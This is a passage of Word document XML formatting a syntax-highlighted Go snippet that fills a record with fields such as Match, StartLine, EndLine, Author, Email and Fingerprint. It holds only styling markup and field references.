        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Match</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strconv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Itoa</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.StartLine)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strconv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Itoa</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.EndLine)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strconv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Itoa</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.StartColumn)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strconv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Itoa</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.EndColumn)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Author</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Message</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Date</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Email</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="7DBDA2"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Fingerprint</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
